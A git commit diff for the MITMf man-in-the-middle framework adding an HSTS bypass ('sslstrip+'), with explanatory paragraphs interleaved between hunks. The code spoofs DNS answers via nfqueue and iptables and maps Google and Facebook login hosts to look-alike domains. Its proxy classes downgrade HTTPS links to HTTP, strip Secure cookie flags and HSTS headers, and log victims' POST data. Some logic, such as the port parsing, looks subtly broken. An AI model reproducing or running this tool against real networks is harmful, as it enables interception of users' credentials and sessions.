added HSTS bypass as demonstrated by Leonardo Nve at Black Hat

byt3bl33d3r 2014-10-11 13:09:06 +02:00
parent 5be41cfd37
commit 82739bba9f
11 changed files with 765 additions and 18 deletions


@ -0,0 +1,7 @@
#here you can configure the domains on which to bypass HSTS
#the format is: real.domain.com = fake.domain.com (the fake host is what the victim's browser is redirected to)
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
www.facebook.com = social.facebook.com
accounts.google.se = cuentas.google.se
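The entries above are read with ConfigObj and turned into two lookup tables elsewhere in this commit (URLMonitorHSTS.__init__ and the Spoof plugin). A minimal sketch of that loading step, using the path and names from the diff:

```python
# Sketch only: mirrors how URLMonitorHSTS.__init__ loads this config in the commit.
from configobj import ConfigObj

hsts_config = ConfigObj("./config_files/hsts_bypass.cfg")

sustitucion = {}  # real host -> fake (HSTS-free) host served to the victim
real = {}         # fake host -> real host, used to undo the rewrite on outgoing requests
for k, v in hsts_config.items():
    sustitucion[k] = v
    real[v] = k

print sustitucion['accounts.google.com']  # -> account.google.com
print real['account.google.com']          # -> accounts.google.com
```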


@ -3,8 +3,6 @@
from twisted.web import http
from twisted.internet import reactor
from sslstrip.StrippingProxy import StrippingProxy
from sslstrip.URLMonitor import URLMonitor
from sslstrip.CookieCleaner import CookieCleaner
from sslstrip.ProxyPlugins import ProxyPlugins
@ -15,7 +13,7 @@ import argparse
from plugins import *
plugin_classes = plugin.Plugin.__subclasses__()
mitmf_version = "0.6"
mitmf_version = "0.7"
sslstrip_version = "0.9"
sergio_version = "0.2.1"
@ -34,6 +32,7 @@ if __name__ == "__main__":
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy')
sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", help="Enable HSTS bypass")
#Initialize plugins
plugins = []
@ -69,7 +68,7 @@ if __name__ == "__main__":
load = []
try:
for p in plugins:
if getattr(args,p.optname):
if getattr(args, p.optname):
p.initialize(args)
load.append(p)
except NotImplementedError:
@ -78,8 +77,28 @@ if __name__ == "__main__":
#Plugins are ready to go, start MITMf
if args.disproxy:
ProxyPlugins.getInstance().setPlugins(load)
reactor.run()
elif args.hsts:
from sslstrip.StrippingProxyHSTS import StrippingProxy
from sslstrip.URLMonitorHSTS import URLMonitor
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
reactor.listenTCP(args.listen, strippingFactory)
print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
print "[*] sslstrip+ by Leonardo Nve running..."
print "[*] sergio-proxy v%s online" % sergio_version
else:
from sslstrip.StrippingProxy import StrippingProxy
from sslstrip.URLMonitor import URLMonitor
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)


@ -6,6 +6,7 @@ from twisted.internet import reactor
from twisted.internet.interfaces import IReadDescriptor
from plugins.plugin import Plugin
from time import sleep
import dns.resolver
import nfqueue
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
@ -45,6 +46,8 @@ class Spoof(Plugin):
self.target = options.target
self.arpmode = options.arpmode
self.port = options.listen
self.hsts = options.hsts
self.hstscfg = "./config_files/hsts_bypass.cfg"
self.manualiptables = options.manualiptables #added by alexander.georgiev@daloo.de
self.debug = False
self.send = True
@ -91,12 +94,17 @@ class Spoof(Plugin):
else:
sys.exit("[-] Spoof plugin requires --arp, --icmp or --dhcp")
if self.dns:
if (self.dns or self.hsts):
print "[*] DNS Tampering enabled"
if self.dns:
self.dnscfg = ConfigObj(self.dnscfg)
self.hstscfg = ConfigObj(self.hstscfg)
if not self.manualiptables:
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
self.start_dns_queue()
file = open('/proc/sys/net/ipv4/ip_forward', 'w')
@ -225,26 +233,52 @@ class Spoof(Plugin):
return pkt
def resolve_domain(self, domain):
try:
answer = dns.resolver.query(domain, 'A')
real_ips = []
for rdata in answer:
real_ips.append(rdata.address)
if len(real_ips) > 0:
return real_ips[0]
except Exception:
logging.debug("Error resolving " + domain)
def nfqueue_callback(self, i, payload):
data = payload.get_data()
pkt = IP(data)
if not pkt.haslayer(DNSQR):
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
if self.dnscfg:
if self.dns:
for k, v in self.dnscfg.items():
if k in pkt[DNS].qd.qname:
if k in pkt[DNSQR].qname:
self.modify_dns(payload, pkt, v)
elif self.domain in pkt[DNS].qd.qname:
self.modify_dns(payload, pkt, self.dnsip)
elif self.hsts:
if (pkt[DNSQR].qtype == 28 or pkt[DNSQR].qtype == 1): #1 = A record, 28 = AAAA record
for k,v in self.hstscfg.items():
if v == pkt[DNSQR].qname[:-1]:
ip = self.resolve_domain(k)
if ip:
self.modify_dns(payload, pkt, ip, hsts=True)
def modify_dns(self, payload, pkt, ip):
if 'wwww' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
if ip:
self.modify_dns(payload, pkt, ip, hsts=True)
def modify_dns(self, payload, pkt, ip, hsts=False):
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=ip))
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
if hsts:
logging.info("%s Resolving %s for HSTS bypass" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
else:
logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
def start_dns_queue(self):


@ -57,9 +57,9 @@ class ClientRequest(Request):
headers['accept-encoding'] = 'identity' #force uncompressed responses so they can be stripped
logging.debug("Zapped encoding")
if 'Strict-Transport-Security' in headers: #kill new hsts requests
del headers['Strict-Transport-Security']
logging.info("Zapped a HSTS request")
if 'strict-transport-security' in headers: #kill new hsts requests
del headers['strict-transport-security']
logging.info("Zapped HSTS header")
if 'if-modified-since' in headers:
del headers['if-modified-since']


@ -0,0 +1,203 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import urlparse, logging, os, sys, random, re
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
from twisted.web.http import HTTPClient
from twisted.internet import ssl
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ClientFactory
from ServerConnectionFactory import ServerConnectionFactory
from ServerConnectionHSTS import ServerConnection
from SSLServerConnectionHSTS import SSLServerConnection
from URLMonitorHSTS import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache
class ClientRequest(Request):
''' This class represents incoming client requests and is essentially where
the magic begins. Here we remove the client headers we don't like, and then
respond with either favicon spoofing, session denial, or proxy through HTTP
or SSL to the server.
'''
def __init__(self, channel, queued, reactor=reactor):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
# self.uniqueId = random.randint(0, 10000)
def cleanHeaders(self):
headers = self.getAllHeaders().copy()
if 'accept-encoding' in headers:
del headers['accept-encoding']
if 'referer' in headers:
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'if-modified-since' in headers:
del headers['if-modified-since']
if 'strict-transport-security' in headers: #kill new hsts requests
del headers['strict-transport-security']
logging.info("Zapped HSTS header")
if 'cache-control' in headers:
del headers['cache-control']
if 'if-none-match' in headers:
del headers['if-none-match']
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
headers['host'] = host
headers['securelink'] = '1'
self.setHeader('Host',host)
return headers
def getPathFromUri(self):
if (self.uri.find("http://") == 0):
index = self.uri.find('/', 7)
return self.uri[index:]
return self.uri
def getPathToLockIcon(self):
if os.path.exists("lock.ico"): return "lock.ico"
scriptPath = os.path.abspath(os.path.dirname(sys.argv[0]))
scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico")
if os.path.exists(scriptPath): return scriptPath
logging.warning("Error: Could not find lock.ico")
return "lock.ico"
def handleHostResolvedSuccess(self, address):
headers = self.cleanHeaders()
# for header in headers:
# logging.debug("HEADER %s = %s",header,headers[header])
logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address))
lhost = self.getHeader("host").lower()
host = self.urlMonitor.URLgetRealHost("%s" % lhost)
client = self.getClientIP()
path = self.getPathFromUri()
self.content.seek(0, 0)
postData = self.content.read()
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
url = 'http://' + host + path
headers['content-length'] = "%d" % len(postData)
self.dnsCache.cacheResolution(host, address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
logging.debug("Sending spoofed favicon response...")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
if 'securelink' in headers:
del headers['securelink']
logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url))
self.proxyViaSSL(address, self.method, path, postData, headers,
self.urlMonitor.getSecurePort(client, url))
else:
logging.debug("LEO Sending request via HTTP...")
self.proxyViaHTTP(address, self.method, path, postData, headers)
def handleHostResolvedError(self, error):
logging.warning("Host resolution error: " + str(error))
try:
self.finish()
except:
pass
def resolveHost(self, host):
address = self.dnsCache.getCachedAddress(host)
if address != None:
logging.debug("Host cached.")
return defer.succeed(address)
else:
logging.debug("Host not cached.")
return reactor.resolve(host)
def process(self):
host = self.urlMonitor.URLgetRealHost("%s"%self.getHeader('host'))
logging.debug("Resolving host: %s" % host)
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection
self.reactor.connectTCP(host, 80, connectionFactory)
def proxyViaSSL(self, host, method, path, postData, headers, port):
clientContextFactory = ssl.ClientContextFactory()
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = SSLServerConnection
self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
def sendExpiredCookies(self, host, path, expireHeaders):
self.setResponseCode(302, "Moved")
self.setHeader("Connection", "close")
self.setHeader("Location", "http://" + host + path)
for header in expireHeaders:
self.setHeader("Set-Cookie", header)
self.finish()
def sendSpoofedFaviconResponse(self):
icoFile = open(self.getPathToLockIcon())
self.setResponseCode(200, "OK")
self.setHeader("Content-type", "image/x-icon")
self.write(icoFile.read())
icoFile.close()
self.finish()

sslstrip/README.sslstrip+ Normal file

@ -0,0 +1,11 @@
SSLStrip+
=========
This is a new version of [Moxie's SSLstrip](http://www.thoughtcrime.org/software/sslstrip/) with a new feature to bypass the HTTP Strict Transport Security (HSTS) protection mechanism.
Like the original, this version rewrites HTTPS links to HTTP, but it also changes the hostnames in the HTML code so the browser never matches them against its HSTS list. Check my slides from Black Hat Asia 2014, [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES](http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014), for more information.
For this to work you also need a DNS server that reverses the changes made by the proxy; you can find one at https://github.com/LeonardoNve/dns2proxy.
Demo video at: http://www.youtube.com/watch?v=uGBjxfizy48
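The hostname rewriting is what actually defeats HSTS: the victim's browser is handed a look-alike hostname that has no entry in its HSTS store, while a cooperating DNS server (dns2proxy, or the Spoof plugin's nfqueue callback added in this commit) resolves those hostnames back to the real servers. A minimal sketch of the substitution rule, paraphrasing the logic added in URLMonitorHSTS.addSecureLink(); the helper function itself is illustrative and not part of the commit:

```python
# Illustrative helper, not part of the commit: paraphrases URLMonitorHSTS.addSecureLink().
hsts_map = {'accounts.google.com': 'account.google.com'}  # entries from config_files/hsts_bypass.cfg

def spoof_hostname(host):
    """Return an HSTS-free hostname for the victim's browser to use."""
    if host in hsts_map:           # explicit mapping from the config file
        return hsts_map[host]
    if host.startswith('www.'):    # www.example.com -> wwww.example.com
        return 'w' + host
    return 'web' + host            # example.com -> webexample.com

# https://www.example.com/login is rewritten to http://wwww.example.com/login on the wire;
# the DNS side then answers the wwww.example.com lookup with the real server's address.
print spoof_hostname('www.example.com')  # -> wwww.example.com
```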


@ -0,0 +1,121 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string
from ServerConnectionHSTS import ServerConnection
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
logging.debug("LEO Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.sustitucion
if dominio in real:
v=" Domain=%s"%real[dominio]
logging.debug("LEO New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
logging.debug("Found path-relative link in secure transmission: " + link)
logging.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
logging.debug("Found relative link in secure transmission: " + link)
logging.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data


@ -23,6 +23,7 @@ from twisted.web.http import HTTPClient
from ResponseTampererFactory import ResponseTampererFactory
from URLMonitor import URLMonitor
from ProxyPlugins import ProxyPlugins
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
@ -105,6 +106,7 @@ class ServerConnection(HTTPClient):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
self.plugins.hook()
def handleEndHeaders(self):


@ -0,0 +1,214 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string, random, zlib, gzip, StringIO
import plugins
from twisted.web.http import HTTPClient
from ResponseTampererFactory import ResponseTampererFactory
from URLMonitorHSTS import URLMonitor
from ProxyPlugins import ProxyPlugins
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
comes back is examined. The headers we don't like are removed, and the links are stripped
from HTTPS to HTTP.
'''
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
# urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
self.urlMonitor = URLMonitor.getInstance()
self.responseTamperer = ResponseTampererFactory.getTampererInstance()
self.plugins = ProxyPlugins.getInstance()
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
def getLogLevel(self):
return logging.DEBUG
def getPostPrefix(self):
return "POST"
def sendRequest(self):
if self.command == 'GET':
logging.info("%s Sending Request: %s %s" % (self.client.getClientIP(), self.command, self.headers['host']))
self.plugins.hook()
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.items():
logging.debug(self.getLogLevel(), "Sending header: %s : %s" % (header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
if 'clientprfl' in self.uri:
self.plugins.hook()
elif 'keylog' in self.uri:
self.plugins.hook()
else:
logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData))
self.transport.write(self.postData)
def connectionMade(self):
logging.debug(self.getLogLevel(), "HTTP connection made.")
self.plugins.hook()
self.sendRequest()
self.sendHeaders()
if (self.command == 'POST'):
self.sendPostData()
def handleStatus(self, version, code, message):
logging.debug(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
logging.debug("Got server header: %s:%s" % (key, value))
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
logging.debug("Response is image content, not scanning...")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
logging.debug("Response is compressed...")
self.isCompressed = True
elif (key.lower() == 'content-length'):
self.contentLength = value
elif (key.lower() == 'set-cookie'):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
self.plugins.hook()
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
if self.length == 0:
self.shutdown()
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
else:
HTTPClient.handleResponsePart(self, data)
def handleResponseEnd(self):
if (self.isImageRequest):
self.shutdown()
else:
try:
HTTPClient.handleResponseEnd(self)
except:
pass
def handleResponse(self, data):
if (self.isCompressed):
logging.debug("Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
logging.debug("Read from server:\n" + data)
#logging.log(self.getLogLevel(), "Read from server:\n <large data>" )
data = self.replaceSecureLinks(data)
#Hook the ResponseTampererFactory
if self.responseTamperer:
data = self.responseTamperer.tamper(self.client.uri, data, self.client.responseHeaders, self.client.getAllHeaders(), self.client.getClientIP())
res = self.plugins.hook()
data = res['data']
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
try:
self.client.write(data) #Gets rid of some generic errors
except:
pass
try:
self.shutdown()
except:
logging.info("Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
sustitucion = {}
patchDict = self.urlMonitor.patchDict
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
logging.debug("Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
logging.debug("LEO replacing %s => %s"%(url,nuevaurl))
sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl)
#data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
#logging.debug("LEO DEBUG received data:\n"+data)
#data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
#data = re.sub(ServerConnection.urlTypewww, 'http://w', data)
#if data.find("http://w.face")!=-1:
# logging.debug("LEO DEBUG Found error in modifications")
# raw_input("Press Enter to continue")
#return re.sub(ServerConnection.urlType, 'http://web.', data)
return data
def shutdown(self):
if not self.shutdownComplete:
self.shutdownComplete = True
try:
self.client.finish()
self.transport.loseConnection()
except:
pass


@ -0,0 +1,29 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from twisted.web.http import HTTPChannel
from ClientRequestHSTS import ClientRequest
class StrippingProxy(HTTPChannel):
'''sslstrip is, at heart, a transparent proxy server that does some unusual things.
This is the basic proxy server class, where we get callbacks for GET and POST methods.
We then proxy these out using HTTP or HTTPS depending on what information we have about
the (connection, client_address) tuple in our cache.
'''
requestFactory = ClientRequest

sslstrip/URLMonitorHSTS.py Normal file

@ -0,0 +1,107 @@
# URLMonitor
import re
import logging
from configobj import ConfigObj
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
'''
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = {} # LEO: dictionary real host -> substitute host
real = {} # LEO: dictionary substitute host -> real host
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
'return"https:"':'return"http:"'
}
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
self.faviconReplacement = False
hsts_config = ConfigObj("./config_files/hsts_bypass.cfg")
for k,v in hsts_config.items():
self.sustitucion[k] = v
self.real[v] = k
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if (re.match(expression, url)):
return True
return (client,url) in self.strippedURLs
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
else:
return 443
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if (portIndex != -1):
host = host[0:portIndex]
port = host[portIndex+1:]
if len(port) == 0:
port = 443
#LEO: substitute the HOST
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
url = 'http://' + host + path
#logging.debug("LEO stripped URL: %s %s"%(client, url))
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+self.sustitucion[host]+path
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self,host):
logging.debug("Parsing host: %s"%host)
if self.real.has_key(host):
logging.debug("New host: %s"%self.real[host])
return self.real[host]
else:
logging.debug("New host: %s"%host)
return host
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
getInstance = staticmethod(getInstance)